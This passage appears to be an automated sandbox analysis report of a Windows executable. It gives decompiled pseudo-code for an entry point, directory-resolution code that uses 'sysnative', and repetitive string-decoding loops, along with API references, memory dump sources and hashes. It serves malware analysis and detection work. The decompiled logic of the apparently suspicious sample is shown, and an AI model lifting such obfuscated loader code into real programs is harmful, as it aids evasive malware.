					E0040DFC0(_t117);
					E0040DFC0(L"sysnative");
					E0040DE60( &_v24, _t69);
					PathAddBackslashW(_v32);
					_push(_v32);
					_t75 = E0040DE20();
					_pop(_t120);
					E0040DFC0(_t120);
					E0040DFC0(_v44);
					E0040DE60( &_v36, _t75);
					_push(_v48);
					_t80 = E0040DE20();
					_pop(_t123);
					E0040DFC0(_t123);
					E0040DFC0(_v60);
					_t125 = _v60;
					E0040DFC0(_t125);
					E0040DE60( &_v52, _t80);
					if(E0040AD60(_t129, 0, _v64) == 0) {
						_a12 = 0;
					} else {
						_a12 = 1;
						E0040A970(0);
					}
					if(E0040AD60(_t129, 0, _a8) == 0) {
						_a16 = 0;
					} else {
						_a16 = 1;
						E0040A970(0);
					}
					if(_a12 + _a16 == 0) {
						_t90 = E0040DE20();
						_t126 = _t125;
						_push(_t90);
						E00406260(_t128, 0x800, E0040DE20());
						E0040DE60( &_v8, _t126);
						GetSystemDirectoryW(_v16, 0x800);
						PathAddBackslashW(_v16);
					}
				}
				_push(_v0);
				_t52 = E0040DE20();
				_pop(_t112);
				E0040DFC0(_t112);
				_t54 = _t52;
				_t55 = E00405170();
				_t113 = _t54;
				_t56 = _t55 + _t113;
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t56, _a8), _v12), _v12), _v12), _v12);
			}

0x00403275
0x00403275
0x00403276
0x0040327b
0x0040327b
0x0040327e
0x00403285
0x00403285
0x00403291
0x0040329d
0x004032a2
0x004032aa
0x004032b6
0x004032cb
0x004032c4
0x004032c4
0x004032c4
0x004032cf
0x0040343c
0x00403441
0x00403442
0x00403450
0x0040345a
0x00403468
0x00403471
0x004032d5
0x004032d6
0x004032db
0x004032dc
0x004032ea
0x004032f4
0x00403302
0x0040330b
0x00403314
0x00403315
0x0040331a
0x0040331d
0x00403328
0x00403332
0x0040333b
0x00403344
0x00403345
0x0040334a
0x0040334d
0x00403357
0x00403361
0x0040336a
0x0040336b
0x00403370
0x00403373
0x0040337d
0x00403382
0x00403387
0x00403391
0x004033a6
0x004033bc
0x004033a8
0x004033a8
0x004033b5
0x004033b5
0x004033d4
0x004033ea
0x004033d6
0x004033d6
0x004033e3
0x004033e3
0x004033fc
0x004033ff
0x00403404
0x00403405
0x00403413
0x0040341d
0x0040342b
0x00403434
0x00403434
0x00403439
0x0040347a
0x0040347b
0x00403480
0x00403483
0x00403488
0x0040348a
0x0040348f
0x00403490
0x004034ce

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040DEBC

PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471

Strings

sysnative, xrefs: 00403322, 00403327

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
String ID: sysnative
API String ID: 3406704365-821172135
Opcode ID: b20c9ae3932b8e0ef357907c6ae28b98a0e625ce9d02519da34cd8c021745bfe
Instruction ID: 120ea7a7f831b7b3701c46aacaf1f8b25255709322070768e577057f0a501d54
Opcode Fuzzy Hash: b20c9ae3932b8e0ef357907c6ae28b98a0e625ce9d02519da34cd8c021745bfe
Instruction Fuzzy Hash: 39512075518701AAD600BBB1CD82F2F66A9EFD0708F10C83FB144791D2CA3CD9595BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			_entry_(void* __ecx, void* __edx, void* __eflags) {
				void _t3;
				void* _t6;
				void* _t13;
				void* _t36;
				intOrPtr _t50;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t63;

				_t63 = __eflags;
				_t54 = __edx;
				_t51 = __ecx;
				memset(0x417008, 0, 0xac);
				 *0x41700c = GetModuleHandleW(0);
				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417008 = _t3;
				E00405000(_t54);
				 *0x41702c = 0x416084; // executed
				_t6 = E0040DDD0(); // executed
				E0040DB41(_t6);
				E00409D61(E0040A2C9(E0040AA40()));
				E00409AE0();
				E00409609(); // executed
				_t13 = E00408D8E(_t51); // executed
				E004053BB(_t13);
				E0040C6E3(_t63);
				E0040B190(_t63);
				E00405068(0x417014, 0x41602a);
				 *0x417034 = GetStdHandle(0xfffffff5);
				_push(0x200);
				_push(0x4170b0);
				E00409D80(4, 0x15, 0);
				E0040A37A( *0x417098);
				E0040A2E8(8, 0x417098, 0x416074, 7);
				E0040A37A( *0x4170a0);
				E0040A2E8(4, 0x4170a0, 0x41606c, 8);
				_push(0x417090);
				_push(0x41607c);
				E0040DB6A(0xc, 0x186a1, 7);
				E00405068(0x417064, 0x416036);
				E0040A37A( *0x4170a8);
				E0040A2E8(4, 0x4170a8, 0x41606c, 8);
				E004098D0(E00401F3B);
				_t36 = E0040DE20();
				_t57 = 0x416036;
				E00402F41(0x417064, _t57, _t63, _t36);
				_push(0x417040);
				E0040DE60();
				E00401B8F(0x417064, _t57, _t63);
				_t50 =  *0x417050; // 0x0
				_t64 = _t50 - 1;
				if(_t50 == 1) {
					E00403001(0x417064, _t57, _t58, _t59, _t64);
				}
				E00403DF3(0x417064, _t58, _t59, _t60);
				_push(0);
				L5();
				E0040DE00();
				HeapDestroy( *0x417008);
				ExitProcess(??);
				E00405379();
				E004098F0();
				E0040A655();
				E0040D264(E0040AA30());
				return E00409AD0();
			}

0x00401000
0x00401000
0x00401000
0x0040100f
0x00401021
0x00401035
0x0040103a
0x0040103f
0x00401049
0x0040104e
0x00401053
0x00401062
0x00401067
0x0040106c
0x00401071
0x00401076
0x0040107b
0x00401080
0x00401090
0x0040109f
0x004010a9
0x004010b0
0x004010be
0x004010c9
0x004010e4
0x004010ef
0x0040110a
0x0040110f
0x00401114
0x00401128
0x00401138
0x00401143
0x0040115e
0x0040116a
0x00401170
0x00401175
0x00401177
0x0040117c
0x00401181
0x00401186
0x0040118b
0x00401191
0x00401194
0x00401196
0x00401196
0x0040119b
0x004011a0
0x004011a5
0x004011aa
0x004011b5
0x004011ba
0x004011bf
0x004011c4
0x004011c9
0x004011d3
0x004011dd

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040DDD0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDDC
Part of subcall function 0040DDD0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDE7

Part of subcall function 00409AE0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9

Part of subcall function 00409609: InitializeCriticalSection.KERNEL32(004176C8,00000004,00000004,004095DC,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409631

Part of subcall function 00408D8E: memset.MSVCRT ref: 00408D9B
Part of subcall function 00408D8E: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408DB5
Part of subcall function 00408D8E: CoInitialize.OLE32(00000000), ref: 00408DBD

Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004176A0,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409D9F
Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DC5
Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E22

Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A3B8
Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3D1
Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3DB

Part of subcall function 0040A2E8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00416074,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A2FB
Part of subcall function 0040A2E8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00416074,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A310

Part of subcall function 0040DB6A: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 0040DB9A
Part of subcall function 0040DB6A: memset.MSVCRT ref: 0040DBD5

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00417040,00000000), ref: 00401BCD
Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32 ref: 00401BEA
Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401BF2

HeapDestroy.KERNEL32(00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004011B5
ExitProcess.KERNEL32(00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004011BA

Strings

6`A, xrefs: 0040112D
*`A, xrefs: 00401085

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonControlsDestroyEnumExitInitLoadModuleProcessResourceTypes
String ID: *`A$6`A
API String ID: 2062415080-4032199909
Opcode ID: 1abe17b022b02830fc4d873b52a8b8611f819b2189e3f8509569470ef6cc0a1a
Instruction ID: 054f58a703c2077171097cea621e0c228d2d39f1c558e4fc4fd495567313132e
Opcode Fuzzy Hash: 1abe17b022b02830fc4d873b52a8b8611f819b2189e3f8509569470ef6cc0a1a
Instruction Fuzzy Hash: 33311C30A84700A9E610B7F29C43FAE3A65AF1874DF11803FB649791E3DEBD55448A6F

Uniqueness

Uniqueness Score: -1.00%

Function 00403DF3, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 640
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00403DF3(void* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, void* _a20, intOrPtr _a28, void* _a44) {
				char _v0;
				signed int _v4;
				WCHAR* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v84;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v120;
				char _v128;
				WCHAR* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				WCHAR* _v160;
				void* __ebx;
				void* _t114;
				void* _t119;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t144;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t157;
				void* _t158;
				void* _t164;
				void* _t169;
				void* _t174;
				void* _t178;
				void* _t186;
				void* _t191;
				void* _t195;
				void* _t198;
				void* _t199;
				char* _t218;
				void* _t220;
				void* _t221;
				void* _t225;
				char* _t230;
				void* _t232;
				void* _t233;
				void* _t237;
				char* _t242;
				void* _t244;
				void* _t245;
				void* _t249;
				char* _t254;
				void* _t256;
				void* _t257;
				void* _t261;
				char* _t266;
				void* _t268;
				void* _t269;
				void* _t273;
				char* _t278;
				void* _t280;
				void* _t281;
				void* _t285;
				char* _t290;
				void* _t292;
				void* _t293;
				void* _t297;
				char* _t302;
				void* _t304;
				void* _t305;
				void* _t309;
				char* _t314;
				void* _t316;
				void* _t317;
				void* _t321;
				intOrPtr _t328;
				void* _t347;
				char _t348;
				intOrPtr _t349;
				void* _t350;
				intOrPtr _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				void* _t360;
				char _t361;
				void* _t362;
				void* _t363;
				void* _t364;
				intOrPtr _t365;
				void* _t366;
				intOrPtr _t367;
				void* _t368;
				intOrPtr _t369;
				void* _t370;
				void* _t372;
				intOrPtr _t374;
				void* _t377;
				intOrPtr _t379;
				void* _t380;
				void* _t383;
				intOrPtr _t384;
				void* _t385;
				intOrPtr _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t391;
				void* _t392;
				void* _t393;
				intOrPtr _t395;
				void* _t396;
				void* _t397;
				intOrPtr _t399;
				void* _t400;
				void* _t401;
				void* _t404;
				void* _t405;
				void* _t408;
				void* _t409;
				void* _t412;
				void* _t413;
				void* _t416;
				void* _t417;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				intOrPtr* _t424;

				_t423 = __ebp;
				_t422 = __esi;
				_t421 = __edi;
				_t347 = __ecx;
				_t348 = 0xf;
				do {
					_t424 = _t424 - 4;
					_v8 = 0;
					_t348 = _t348 - 1;
				} while (_t348 != 0);
				E0040DF60();
				 *0x41702c = 0x41609a;
				_v8 = 0;
				while(1) {
					_t427 = 0x19 - _v8;
					if(0x19 < _v8) {
						break;
					}
					_t314 =  *0x41702c; // 0x41609a
					_v4 =  *_t314;
					 *0x41702c =  *0x41702c + 1;
					_t316 = E0040DE20();
					_t417 = _t348;
					_push(_t316);
					_push(_t417);
					_t317 = E0040DE20();
					E00405D60(_t427, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t317);
					_push(_v12);
					_t321 = E0040DE20();
					_pop(_t420);
					E0040DFC0(_t420);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v20, _t321);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160fe;
				_v8 = 0;
				while(1) {
					_t429 = 2 - _v8;
					if(2 < _v8) {
						break;
					}
					_t302 =  *0x41702c; // 0x41609a
					_v4 =  *_t302;
					 *0x41702c =  *0x41702c + 1;
					_t304 = E0040DE20();
					_t413 = _t348;
					_push(_t304);
					_push(_t413);
					_t305 = E0040DE20();
					E00405D60(_t429, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t305);
					_push(_v8);
					_t309 = E0040DE20();
					_pop(_t416);
					E0040DFC0(_t416);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v16, _t309);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x416103;
				_v8 = 0;
				while(1) {
					_t431 = 3 - _v8;
					if(3 < _v8) {
						break;
					}
					_t290 =  *0x41702c; // 0x41609a
					_v4 =  *_t290;
					 *0x41702c =  *0x41702c + 1;
					_t292 = E0040DE20();
					_t409 = _t348;
					_push(_t292);
					_push(_t409);
					_t293 = E0040DE20();
					E00405D60(_t431, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t293);
					_push(_v4);
					_t297 = E0040DE20();
					_pop(_t412);
					E0040DFC0(_t412);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v12, _t297);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x416101;
				_v8 = 0;
				while(1) {
					_t433 = 1 - _v8;
					if(1 < _v8) {
						break;
					}
					_t278 =  *0x41702c; // 0x41609a
					_v4 =  *_t278;
					 *0x41702c =  *0x41702c + 1;
					_t280 = E0040DE20();
					_t405 = _t348;
					_push(_t280);
					_push(_t405);
					_t281 = E0040DE20();
					E00405D60(_t433, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t281);
					_push(_v0);
					_t285 = E0040DE20();
					_pop(_t408);
					E0040DFC0(_t408);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v8, _t285);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160d7;
				_v8 = 0;
				while(1) {
					_t435 = 0xd - _v8;
					if(0xd < _v8) {
						break;
					}
					_t266 =  *0x41702c; // 0x41609a
					_v4 =  *_t266;
					 *0x41702c =  *0x41702c + 1;
					_t268 = E0040DE20();
					_t401 = _t348;
					_push(_t268);
					_push(_t401);
					_t269 = E0040DE20();
					E00405D60(_t435, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t269);
					_push(_a4);
					_t273 = E0040DE20();
					_pop(_t404);
					E0040DFC0(_t404);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v4, _t273); // executed
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160e5;
				_v8 = 0;
				while(1) {
					_t437 = 0xe - _v8;
					if(0xe < _v8) {
						break;
					}
					_t254 =  *0x41702c; // 0x41609a
					_v4 =  *_t254;
					 *0x41702c =  *0x41702c + 1;
					_t256 = E0040DE20();
					_t397 = _t348;
					_push(_t256);
					_push(_t397);
					_t257 = E0040DE20();
					E00405D60(_t437, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t257);
					_t399 =  *0x417030; // 0x27904d0
					_t261 = E0040DE20();
					_t400 = _t399;
					E0040DFC0(_t400);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x417030, _t261);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160f4;
				_v8 = 0;
				while(1) {
					_t439 = 9 - _v8;
					if(9 < _v8) {
						break;
					}
					_t242 =  *0x41702c; // 0x41609a
					_v4 =  *_t242;
					 *0x41702c =  *0x41702c + 1;
					_t244 = E0040DE20();
					_t393 = _t348;
					_push(_t244);
					_push(_t393);
					_t245 = E0040DE20();
					E00405D60(_t439, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t245);
					_t395 =  *0x417080; // 0x2790500
					_t249 = E0040DE20();
					_t396 = _t395;
					E0040DFC0(_t396);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x417080, _t249);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x41608c;
				_v8 = 0;
				while(1) {
					_t441 = 4 - _v8;
					if(4 < _v8) {
						break;
					}
					_t230 =  *0x41702c; // 0x41609a
					_v4 =  *_t230;
					 *0x41702c =  *0x41702c + 1;
					_t232 = E0040DE20();
					_t389 = _t348;
					_push(_t232);
					_push(_t389);
					_t233 = E0040DE20();
					E00405D60(_t441, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t233);
					_t391 =  *0x41705c; // 0x2797ff0
					_t237 = E0040DE20();
					_t392 = _t391;
					E0040DFC0(_t392);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x41705c, _t237); // executed
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x41610b;
				_v8 = 0;
				while(1) {
					_t443 = 3 - _v8;
					if(3 < _v8) {
						break;
					}
					_t218 =  *0x41702c; // 0x41609a
					_v4 =  *_t218;
					 *0x41702c =  *0x41702c + 1;
					_t220 = E0040DE20();
					_t385 = _t348;
					_push(_t220);
					_push(_t385);
					_t221 = E0040DE20();
					E00405D60(_t443, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t221);
					_t387 =  *0x417058; // 0x2799b50
					_t225 = E0040DE20();
					_t388 = _t387;
					E0040DFC0(_t388);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x417058, _t225);
					_v40 = _v40 + 1;
					_t444 = _v40;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				_t349 =  *0x417058; // 0x2799b50
				_t114 = E0040DE20();
				_t350 = _t349;
				E0040DFC0(_t350);
				_t351 = _a8;
				E0040DFC0(_t351);
				E0040DE60(0x417058, _t114);
				_t119 = E0040DE20();
				_t352 = _t351;
				E00403275(_t421, _t423, _v8, _v4);
				E0040DE60( &_v0, _t119);
				_v4 = E004097FE();
				 *0x41704c = GetModuleHandleW(0);
				_t125 = E0040DE20();
				_t353 = _t352;
				_push(_t125);
				_t126 = E0040DE20();
				_t354 = _t353;
				_push(_t126);
				_t127 = E0040DE20();
				_t355 = _t354;
				_push(_t127);
				_t128 = E0040DE20();
				_t356 = _t355;
				E00405182(E0040D0A0( *0x417040, 1, _t128));
				_v64 = _v64 + _t356;
				E00405E50(_t347, _t444);
				_push( &_v20);
				E0040DE60();
				_t134 = E0040DE20();
				_t357 = _t356;
				_push(_t134);
				_t135 = E0040DE20();
				_t358 = _t357;
				_push(_t135);
				_t136 = E0040DE20();
				_t359 = _t358;
				_push(_t136);
				_t137 = E0040DE20();
				_t360 = _t359;
				E00405182(E0040D0A0(_v28, 1, _t137));
				 *_t424 =  *_t424 + _t360;
				E00405E50(_t347, _t444);
				_push( &_v48);
				E0040DE60();
				_v56 = E00402E9D(_v56);
				_t144 = E0040DE20();
				_t361 = _t360;
				E004051A0(E004021A4(_t347, _t361, _t421, _t422, _v56, _t144));
				E0040195B(_t361);
				E0040460E(_t361, _t422, _v64);
				_t149 = E0040DE20();
				_t362 = _t361;
				_push(_t149);
				_push(_v100);
				_push(_v68 + 4);
				_pop(_t150);
				_t151 = E00405100(_t150);
				E0040358D(_t422);
				E0040DE60(0x417048, _t151);
				PathRemoveBackslashW( *0x417048);
				E0040213E(_v84);
				_t157 = E0040DE20();
				_t363 = _t362;
				_push(_t157);
				_t158 = E0040DE20();
				_t364 = _t363;
				E00402BFA(_t444,  *0x417048);
				E00405182(E0040E020(_t347));
				_v144 = _v144 + _t364;
				E004051A0(E00409860(_v108, _t158));
				_t365 =  *0x417024; // 0x2798958
				_t164 = E0040DE20();
				_t366 = _t365;
				E0040DFC0(_t366);
				_t367 =  *0x417058; // 0x2799b50
				E0040DFC0(_t367);
				E0040DE60(0x417058, _t164);
				_t169 = E0040DE20();
				_t368 = _t367;
				E00401E55(_t368, _t422, _t444, _v128);
				E0040DE60( &_v120, _t169);
				E00403855(_t347, _t421);
				_t369 =  *0x417038; // 0x27989d0
				_t174 = E0040DE20();
				_t370 = _t369;
				E0040DFC0(_t370);
				E0040DE60( &_v128, _t174);
				PathQuoteSpacesW(_v136);
				_push(_v136);
				_t178 = E0040DE20();
				_pop(_t372);
				E0040DFC0(_t372);
				E0040DFC0(0x416026);
				_t374 = _v148;
				E0040DFC0(_t374);
				E0040DE60( &_v152, _t178);
				PathQuoteSpacesW(_v160);
				_t328 =  *0x417060; // 0x0
				_t445 = _t328 - 1;
				if(_t328 != 1) {
					E00402CA9(_t421, _t422, _a28);
				} else {
					 *0x417010 = E00405492(_t328, E00402CA9, _a28);
				}
				_push(_t374);
				_push(E0040DE20());
				_push( *((intOrPtr*)(_t424 + 0x1c)));
				_t186 = E0040DE20();
				_pop(_t377);
				_push(_t186);
				E0040DFC0(_t377);
				E0040DFC0(0x416026);
				_t379 = _a28;
				E0040DFC0(_t379);
				E0040E020(_t347);
				_t191 = E0040DE20();
				_t380 = _t379;
				_push(_t191);
				_push(_t380);
				E0040A795(_t445, E0040DE20());
				E0040E020(_t347);
				_push(_a4);
				_t195 = E0040DE20();
				_pop(_t383);
				E0040DFC0(_t383);
				_t384 = _v16;
				_t198 = E00405182(E0040DFC0(_t384));
				_v52 = _v52 + _t384;
				_t199 = E00405182(_t198);
				_v48 = _v48 + _t384;
				E00405182(_t199);
				_v44 = _v44 + _t384;
				_a4 = E004051A0(E00402022(), _t195);
				_push(_a4);
				E00401FA9(_t328);
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(0, _v16), _v12), _v52), _v52), _v64), _v56), _v28), _v52),  *((intOrPtr*)(_t424 + 0x1c))), _v68);
			}

0x00403df3
0x00403df3
0x00403df3
0x00403df3
0x00403df4
0x00403df9
0x00403df9
0x00403dfc
0x00403e03
0x00403e03
0x00403e06
0x00403e10
0x00403e15
0x00403e1e
0x00403e23
0x00403e26
0x00000000
0x00000000
0x00403e28
0x00403e30
0x00403e34
0x00403e3b
0x00403e40
0x00403e41
0x00403e42
0x00403e43
0x00403e52
0x00403e5c
0x00403e65
0x00403e66
0x00403e6b
0x00403e6e
0x00403e73
0x00403e78
0x00403e82
0x00403e87
0x00403e8a
0x00000000
0x00000000
0x00000000
0x00403e8a
0x00403e91
0x00403e96
0x00403e9f
0x00403ea4
0x00403ea7
0x00000000
0x00000000
0x00403ea9
0x00403eb1
0x00403eb5
0x00403ebc
0x00403ec1
0x00403ec2
0x00403ec3
0x00403ec4
0x00403ed3
0x00403edd
0x00403ee6
0x00403ee7
0x00403eec
0x00403eef
0x00403ef4
0x00403ef9
0x00403f03
0x00403f08
0x00403f0b
0x00000000
0x00000000
0x00000000
0x00403f0b
0x00403f12
0x00403f17
0x00403f20
0x00403f25
0x00403f28
0x00000000
0x00000000
0x00403f2a
0x00403f32
0x00403f36
0x00403f3d
0x00403f42
0x00403f43
0x00403f44
0x00403f45
0x00403f54
0x00403f5e
0x00403f67
0x00403f68
0x00403f6d
0x00403f70
0x00403f75
0x00403f7a
0x00403f84
0x00403f89
0x00403f8c
0x00000000
0x00000000
0x00000000
0x00403f8c
0x00403f93
0x00403f98
0x00403fa1
0x00403fa6
0x00403fa9
0x00000000
0x00000000
0x00403fab
0x00403fb3
0x00403fb7
0x00403fbe
0x00403fc3
0x00403fc4
0x00403fc5
0x00403fc6
0x00403fd5
0x00403fdf
0x00403fe8
0x00403fe9
0x00403fee
0x00403ff1
0x00403ff6
0x00403ffb
0x00404005
0x0040400a
0x0040400d
0x00000000
0x00000000
0x00000000
0x0040400d
0x00404014
0x00404019
0x00404022
0x00404027
0x0040402a
0x00000000
0x00000000
0x0040402c
0x00404034
0x00404038
0x0040403f
0x00404044
0x00404045
0x00404046
0x00404047
0x00404056
0x00404060
0x00404069
0x0040406a
0x0040406f
0x00404072
0x00404077
0x0040407c
0x00404086
0x0040408b
0x0040408e
0x00000000
0x00000000
0x00000000
0x0040408e
0x00404095
0x0040409a
0x004040a3
0x004040a8
0x004040ab
0x00000000
0x00000000
0x004040ad
0x004040b5
0x004040b9
0x004040c0
0x004040c5
0x004040c6
0x004040c7
0x004040c8
